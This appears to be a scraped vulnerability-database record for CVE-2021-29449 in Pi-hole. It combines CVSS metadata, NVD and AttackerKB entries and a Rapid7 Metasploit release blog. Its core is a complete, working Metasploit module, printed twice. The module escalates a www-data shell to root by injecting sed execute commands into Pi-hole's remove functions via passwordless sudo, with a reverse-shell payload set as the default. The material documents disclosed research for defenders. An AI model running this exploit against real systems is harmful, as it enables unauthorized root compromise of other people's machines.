Pi-Hole versions 3.0 through 5.3 allow command-line input to the removecustomcname, removecustomdns, and removestaticdhcp functions to be passed to sed without the parameters being properly validated. When executed as the www-data user, this allows privilege escalation to root, since www-data is listed in the sudoers.d/pihole file with no password.
{"id": "1337DAY-ID-36613", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Pi-Hole Remove Commands Linux Privilege Escalation Exploit", "description": "Pi-Hole versions 3.0 through 5.3 allows for command line input to the removecustomcname, removecustomdns, and removestaticdhcp functions without properly validating the parameters before passing to sed. When executed as the www-data user, this allows for a privilege escalation to root since www-data is in the sudoers.d/pihole file with no password.", "published": "2021-07-30T00:00:00", "modified": "2021-07-30T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/36613", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2021-29449"], "immutableFields": [], "lastseen": "2022-04-11T23:56:02", "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:4EFB7983-D467-4269-B8DE-5AA419E4770D"]}, {"type": "cve", "idList": ["CVE-2021-29449"]}, {"type": "packetstorm", "idList": 
["PACKETSTORM:163715"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED"]}], "rev": 4}, "score": {"value": 7.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:4EFB7983-D467-4269-B8DE-5AA419E4770D"]}, {"type": "cve", "idList": ["CVE-2021-29449"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163715"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED"]}]}, "exploitation": null, "vulnersScore": 7.0}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://0day.today/exploit/36613", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n # includes: is_root?\n include Msf::Post::Linux::Priv\n # includes writable?, upload_file, upload_and_chmodx, exploit_data\n include Msf::Post::File\n # for whoami\n include Msf::Post::Unix\n # for get_session_pid needed by whoami\n include Msf::Post::Linux::System\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pi-Hole Remove Commands Linux Priv Esc',\n 'Description' => %q{\n Pi-Hole versions 3.0 - 5.3 allows for command line input to the removecustomcname,\n removecustomdns, and removestaticdhcp functions without properly validating\n the parameters before passing to sed. 
When executed as the www-data user,\n this allows for a privilege escalation to root since www-data is in the\n sudoers.d/pihole file with no password.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h00die', # msf module\n 'Emanuele Barbeno <emanuele.barbeno[at]compass-security.com>' # original PoC, analysis\n ],\n 'Platform' => [ 'unix', 'linux' ],\n 'Arch' => [ ARCH_CMD ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_php_ssl' },\n 'Payload' =>\n {\n 'BadChars' => \"\\x27\" # '\n },\n 'Privileged' => true,\n 'References' =>\n [\n [ 'URL', 'https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj' ],\n [ 'URL', 'https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt' ],\n [ 'CVE', '2021-29449' ]\n ],\n 'DisclosureDate' => '2021-04-20',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]\n },\n 'Targets' => [\n ['DHCP', { 'min' => Rex::Version.new('3.0') }], # exploitable by default, expecially when combined with unix/http/pihole_dhcp_mac_exec\n ['DNS', { 'min' => Rex::Version.new('5.0') }],\n ['CNAME', { 'min' => Rex::Version.new('5.1') }],\n ],\n 'DefaultTarget' => 0\n )\n )\n end\n\n def sudo_pihole\n 'sudo /usr/local/bin/pihole -a'\n end\n\n def pihole_version\n version = cmd_exec('sudo /usr/local/bin/pihole -v')\n /Pi-hole version is v([^ ]+)/ =~ version\n Rex::Version.new(Regexp.last_match(1))\n end\n\n def check\n w = whoami\n print_status(\"Current user: #{w}\")\n v = pihole_version\n print_status(\"Pi-hole version: #{v}\")\n unless v.between?(target['min'], Rex::Version.new('5.3'))\n return CheckCode::Safe(\"Pi-Hole version #{v} is >= 5.3 and not vulnerable\")\n end\n unless w == 'www-data'\n return CheckCode::Safe(\"User must be www-data, currently #{w}\")\n end\n\n CheckCode::Appears(\"Pi-Hole #{v} with user #{w} is vulnerable 
and exploitable\")\n end\n\n def method_dhcp\n f = '/etc/dnsmasq.d/04-pihole-static-dhcp.conf'\n if !file?(f) || read_file(f).empty?\n mac = Faker::Internet.mac_address\n ip = \"10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}\"\n print_status(\"Adding static DHCP #{mac} #{ip}\")\n cmd_exec(\"#{sudo_pihole} addstaticdhcp '#{mac}' '#{ip}'\")\n end\n unless file?(f)\n print_error(\"Config file not found: #{f}\")\n return\n end\n print_good(\"#{f} found!\")\n print_status('Executing payload against removestaticdhcp command')\n cmd_exec(\"#{sudo_pihole} removestaticdhcp 'a/d ; 1e #{payload.encoded} ; /'\")\n if mac\n cmd_exec(\"#{sudo_pihole} removestaticdhcp '#{mac}'\")\n end\n end\n\n def method_dns\n f = '/etc/pihole/custom.list'\n if !file?(f) || read_file(f).empty?\n name = Faker::Internet.domain_name\n ip = \"10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}\"\n print_status(\"Adding DNS entry #{name} #{ip}\")\n cmd_exec(\"#{sudo_pihole} addcustomdns '#{ip}' '#{name}'\")\n end\n unless file?(f)\n print_error(\"Config file not found: #{f}\")\n return\n end\n print_good(\"#{f} found!\")\n print_status('Executing payload against removecustomdns command')\n cmd_exec(\"#{sudo_pihole} removecustomdns 'a/d ; 1e #{payload.encoded} ; /'\")\n if name\n cmd_exec(\"#{sudo_pihole} removecustomdns '#{ip}' '#{name}'\")\n end\n end\n\n def method_cname\n f = '/etc/dnsmasq.d/05-pihole-custom-cname.conf'\n if !file?(f) || read_file(f).empty?\n name = \"#{rand_text_alphanumeric(8..12)}.edu\"\n print_status(\"Adding CNAME entry #{name}\")\n cmd_exec(\"#{sudo_pihole} addcustomcname '#{name}' '#{name}'\")\n end\n unless file?(f)\n print_error(\"Config file not found: #{f}\")\n return\n end\n print_good(\"#{f} found!\")\n print_status('Executing payload against removecustomcname command')\n cmd_exec(\"#{sudo_pihole} removecustomcname 'a/d ; 1e #{payload.encoded} ; /'\")\n if name\n cmd_exec(\"#{sudo_pihole} removecustomcname '#{name}' 
'#{name}'\")\n end\n end\n\n def exploit\n if target.name == 'DHCP'\n method_dhcp\n elsif target.name == 'DNS'\n method_dns\n elsif target.name == 'CNAME'\n method_cname\n end\n end\nend\n", "category": "remote exploits", "verified": true}
{"cve": [{"lastseen": "2022-04-05T20:53:44", "description": "Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Multiple privilege escalation vulnerabilities were discovered in version 5.2.4 of Pi-hole core. See the referenced GitHub security advisory for details.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-14T22:15:00", "type": "cve", "title": "CVE-2021-29449", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29449"], "modified": "2022-04-05T18:03:00", "cpe": ["cpe:/a:pi-hole:pi-hole:5.2.4"], "id": "CVE-2021-29449", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-29449", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pi-hole:pi-hole:5.2.4:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-07-30T17:21:35", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 
7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-30T00:00:00", "type": "packetstorm", "title": "Pi-Hole Remove Commands Linux Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29449"], "modified": "2021-07-30T00:00:00", "id": "PACKETSTORM:163715", "href": "https://packetstormsecurity.com/files/163715/Pi-Hole-Remove-Commands-Linux-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \n# includes: is_root? \ninclude Msf::Post::Linux::Priv \n# includes writable?, upload_file, upload_and_chmodx, exploit_data \ninclude Msf::Post::File \n# for whoami \ninclude Msf::Post::Unix \n# for get_session_pid needed by whoami \ninclude Msf::Post::Linux::System \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Pi-Hole Remove Commands Linux Priv Esc', \n'Description' => %q{ \nPi-Hole versions 3.0 - 5.3 allows for command line input to the removecustomcname, \nremovecustomdns, and removestaticdhcp functions without properly validating \nthe parameters before passing to sed. 
When executed as the www-data user, \nthis allows for a privilege escalation to root since www-data is in the \nsudoers.d/pihole file with no password. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die', # msf module \n'Emanuele Barbeno <emanuele.barbeno[at]compass-security.com>' # original PoC, analysis \n], \n'Platform' => [ 'unix', 'linux' ], \n'Arch' => [ ARCH_CMD ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_php_ssl' }, \n'Payload' => \n{ \n'BadChars' => \"\\x27\" # ' \n}, \n'Privileged' => true, \n'References' => \n[ \n[ 'URL', 'https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj' ], \n[ 'URL', 'https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt' ], \n[ 'CVE', '2021-29449' ] \n], \n'DisclosureDate' => '2021-04-20', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] \n}, \n'Targets' => [ \n['DHCP', { 'min' => Rex::Version.new('3.0') }], # exploitable by default, expecially when combined with unix/http/pihole_dhcp_mac_exec \n['DNS', { 'min' => Rex::Version.new('5.0') }], \n['CNAME', { 'min' => Rex::Version.new('5.1') }], \n], \n'DefaultTarget' => 0 \n) \n) \nend \n \ndef sudo_pihole \n'sudo /usr/local/bin/pihole -a' \nend \n \ndef pihole_version \nversion = cmd_exec('sudo /usr/local/bin/pihole -v') \n/Pi-hole version is v([^ ]+)/ =~ version \nRex::Version.new(Regexp.last_match(1)) \nend \n \ndef check \nw = whoami \nprint_status(\"Current user: #{w}\") \nv = pihole_version \nprint_status(\"Pi-hole version: #{v}\") \nunless v.between?(target['min'], Rex::Version.new('5.3')) \nreturn CheckCode::Safe(\"Pi-Hole version #{v} is >= 5.3 and not vulnerable\") \nend \nunless w == 'www-data' \nreturn CheckCode::Safe(\"User must be www-data, currently #{w}\") \nend \n \nCheckCode::Appears(\"Pi-Hole #{v} with user #{w} is 
vulnerable and exploitable\") \nend \n \ndef method_dhcp \nf = '/etc/dnsmasq.d/04-pihole-static-dhcp.conf' \nif !file?(f) || read_file(f).empty? \nmac = Faker::Internet.mac_address \nip = \"10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}\" \nprint_status(\"Adding static DHCP #{mac} #{ip}\") \ncmd_exec(\"#{sudo_pihole} addstaticdhcp '#{mac}' '#{ip}'\") \nend \nunless file?(f) \nprint_error(\"Config file not found: #{f}\") \nreturn \nend \nprint_good(\"#{f} found!\") \nprint_status('Executing payload against removestaticdhcp command') \ncmd_exec(\"#{sudo_pihole} removestaticdhcp 'a/d ; 1e #{payload.encoded} ; /'\") \nif mac \ncmd_exec(\"#{sudo_pihole} removestaticdhcp '#{mac}'\") \nend \nend \n \ndef method_dns \nf = '/etc/pihole/custom.list' \nif !file?(f) || read_file(f).empty? \nname = Faker::Internet.domain_name \nip = \"10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}\" \nprint_status(\"Adding DNS entry #{name} #{ip}\") \ncmd_exec(\"#{sudo_pihole} addcustomdns '#{ip}' '#{name}'\") \nend \nunless file?(f) \nprint_error(\"Config file not found: #{f}\") \nreturn \nend \nprint_good(\"#{f} found!\") \nprint_status('Executing payload against removecustomdns command') \ncmd_exec(\"#{sudo_pihole} removecustomdns 'a/d ; 1e #{payload.encoded} ; /'\") \nif name \ncmd_exec(\"#{sudo_pihole} removecustomdns '#{ip}' '#{name}'\") \nend \nend \n \ndef method_cname \nf = '/etc/dnsmasq.d/05-pihole-custom-cname.conf' \nif !file?(f) || read_file(f).empty? 
\nname = \"#{rand_text_alphanumeric(8..12)}.edu\" \nprint_status(\"Adding CNAME entry #{name}\") \ncmd_exec(\"#{sudo_pihole} addcustomcname '#{name}' '#{name}'\") \nend \nunless file?(f) \nprint_error(\"Config file not found: #{f}\") \nreturn \nend \nprint_good(\"#{f} found!\") \nprint_status('Executing payload against removecustomcname command') \ncmd_exec(\"#{sudo_pihole} removecustomcname 'a/d ; 1e #{payload.encoded} ; /'\") \nif name \ncmd_exec(\"#{sudo_pihole} removecustomcname '#{name}' '#{name}'\") \nend \nend \n \ndef exploit \nif target.name == 'DHCP' \nmethod_dhcp \nelsif target.name == 'DNS' \nmethod_dns \nelsif target.name == 'CNAME' \nmethod_cname \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163715/pihole_remove_commands_lpe.rb.txt", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-08-02T17:26:35", "description": "Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Multiple privilege escalation vulnerabilities were discovered in version 5.2.4 of Pi-hole core. See the referenced GitHub security advisory for details.\n\n \n**Recent assessments:** \n \n**h00die** at May 31, 2021 11:59am UTC reported:\n\nThere are 3 vulnerabilities associated with this CVE, all are priv esc. All three use the same simple trick to execute while being sent to `sed` from the command line. 
`www-data` by default is listed in the `sudoers` file to run `pihole`.\n\n`removestaticdhcp` command requires `/etc/dnsmasq.d/04-pihole-static-dhcp.conf`, and is exploitable from 3.0-5.2.4.\n\n`removecustomdns` command requires `/etc/pihole/custom.list`, and is exploitable from 5.1-5.2.4.\n\n`removecustomcname` command requires `/etc/dnsmasq.d/05-pihole-custom-cname.conf`, and is exploitable from 5.0-5.2.4.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-29449", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29449"], "modified": "2021-04-23T00:00:00", "id": "AKB:4EFB7983-D467-4269-B8DE-5AA419E4770D", "href": "https://attackerkb.com/topics/0HUT2niFGw/cve-2021-29449", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-30T19:00:15", "description": "## New Olympic Discipline: Hive Hunting\n\n\n\nThis week, community contributor [Hakyac](<https://github.com/Hakyac>) added a new Olympic discipline to 
Metasploit exploit sport category, which is based on the work of community security researchers [@jonasLyk](<https://twitter.com/jonasLyk/status/1417205166172950531>) and [Kevin Beaumont](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)). The rules are simple: You need to abuse a flaw in Windows 10 and 11 configuration to pass through the defense and access Security Account Manager (SAM) files. Any local unprivileged player is able to read this sensitive security information, such as hashes of user/admin passwords. The best strategy to win a gold medal is to start abusing Windows Volume Shadow Copy Service (VSS) to access these files and copy them locally. Finally, you just need to dump the NTLM hashes, use them in a pass-the-hash attack and score with a remote code execution.\n\nNote that Microsoft issued an out-of-band [advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and tracked this vulnerability as [CVE-2021-36934](<https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege?referrer=blog>). You can find more information about the rules in this blog [post](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>). Happy Hive hunting!\n\n## Gold Medal for NetGear R7000 in Swimming 100m Heap Overflow\n\nOur own [Grant Willcox](<https://github.com/gwillcox-r7>) added a new exploit module that won the Swimming 100m Heap Overflow discipline. It took advantage of a flaw in `genie.cgi?backup.cgi` page of Netgear R7000 routers to enable a telnet server and easily got code execution as the `root` user. Note that, whereas firmware versions `1.0.11.116` and prior are vulnerable, this module can only be used with versions `1.0.11.116` at the moment. The `check` method can still be used to detect if older devices are vulnerable. 
This module is based on research done by [@colorlight2019](<https://twitter.com/colorlight2019>). A new gold medal for the Metasploit team, great job!\n\n## New module content (5)\n\n * [Netgear R7000 backup.cgi Heap Overflow RCE](<https://github.com/rapid7/metasploit-framework/pull/15163>) by [Grant Willcox](<https://github.com/gwillcox-r7>), SSD Disclosure, and colorlight2019, which exploits [CVE-2021-31802](<https://attackerkb.com/topics/KwzVhOiykj/cve-2021-31802?referrer=blog>) \\- This adds an module that will leverage CVE-2021-31802 which is an unauthenticated RCE in Netgear R7000 routers. The vulnerability is leveraged to execute a shellcode stub that will enable telnet which can then be accessed for root privileges on the affected device.\n * [Pi-Hole Remove Commands Linux Priv Esc](<https://github.com/rapid7/metasploit-framework/pull/15279>) by [Emanuele Barbeno](<https://ch.linkedin.com/in/emanuele-barbeno-b53a4990>) and [h00die](<https://github.com/h00die>), which exploits [CVE-2021-29449](<https://attackerkb.com/topics/0HUT2niFGw/cve-2021-29449?referrer=blog>) \\- This adds a local privilege escalation module that targets Pi-Hole versions >= `3.0` and <= `5.2.4`. In vulnerable versions of the software, a user with `sudo` privileges can escalate to `root` by passing shell commands to either the `removecustomcname`, `removecustomdns`, or `removestaticdhcp` function. The functions have minimal sanitization, and they pass the input to the `sed` command. 
By default, the `www-data` user is permitted to run `sudo` without supplying a password as configured in the `sudoers.d/pihole` file.\n * [Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15418>) by Nguyen Van Khanh, [Ron Jost](<https://github.com/Hacker5preme>), and [Yann Castel](<https://github.com/Hakyac>), which exploits [CVE-2021-24145](<https://attackerkb.com/topics/TWCON6tk7O/cve-2021-24145?referrer=blog>) \\- This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin known as Modern Events Calendar. For versions before `5.16.5`, an administrative user can upload a php payload via the calendar import feature by setting the content type of the file to `text/csv`. Code execution with the privileges of the user running the server is achieved by sending a request for the uploaded file.\n * [Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15408>) by [Ron Jost](<https://github.com/Hacker5preme>) and [Yann Castel](<https://github.com/Hakyac>), which exploits [CVE-2021-24347](<https://attackerkb.com/topics/gechd9yh12/cve-2021-24347?referrer=blog>) \\- This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin, SP Project and Document Manager. For versions below `4.22`, an authenticated user can upload arbitrary PHP code because the security check only blocks the upload of files with a `.php` extension, meaning that uploading a file with a `.pHp` extension is allowed. 
Once uploaded, requesting the file will result in code execution as the `www-data` user.\n * [Windows SAM secrets leak - HiveNightmare](<https://github.com/rapid7/metasploit-framework/pull/15462>) by [Kevin Beaumont](<https://twitter.com/GossiTheDog>), [Yann Castel](<https://github.com/Hakyac>), and [romarroca](<https://github.com/romarroca>), which exploits [CVE-2021-36934](<https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege?referrer=blog>) \\- This adds a new exploit module that exploits a configuration issue in Windows 10 (from version 1809) and 11, identified as CVE-2021-36934. Due to permission issues, any local user is able to read SAM and SYSTEM hives. This module abuses Windows Volume Shadow Copy Service (VSS) to access these files and save them locally.\n\n## Enhancements and features\n\n * [#15444](<https://github.com/rapid7/metasploit-framework/pull/15444>) from [pingport80](<https://github.com/pingport80>) \\- This adds additional support for Powershell sessions to some methods in the File mixin leveraged by post modules.\n * [#15465](<https://github.com/rapid7/metasploit-framework/pull/15465>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- Updates the local exploit suggester to gracefully handle modules raising unintended exceptions and nil target information\n\n## Bugs fixed\n\n * [#15359](<https://github.com/rapid7/metasploit-framework/pull/15359>) from [stephenbradshaw](<https://github.com/stephenbradshaw>) \\- Fixes a bug in the ssh_login_pubkey which would crash out when not connected to the db\n * [#15460](<https://github.com/rapid7/metasploit-framework/pull/15460>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the File libraries `copy_file` method caused by it searching for a word in the output to determine success.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes 
since the last blog post from GitHub:\n\n * [Pull Requests 6.0.54...6.0.55](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-22T11%3A58%3A03-05%3A00..2021-07-29T12%3A01%3A27-05%3A00%22>)\n * [Full diff 6.0.54...6.0.55](<https://github.com/rapid7/metasploit-framework/compare/6.0.54...6.0.55>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-30T18:04:33", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145", "CVE-2021-24347", "CVE-2021-29449", "CVE-2021-31802", "CVE-2021-36934"], "modified": "2021-07-30T18:04:33", "id": 
"RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED", "href": "https://blog.rapid7.com/2021/07/30/metasploit-wrap-up-123/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}]}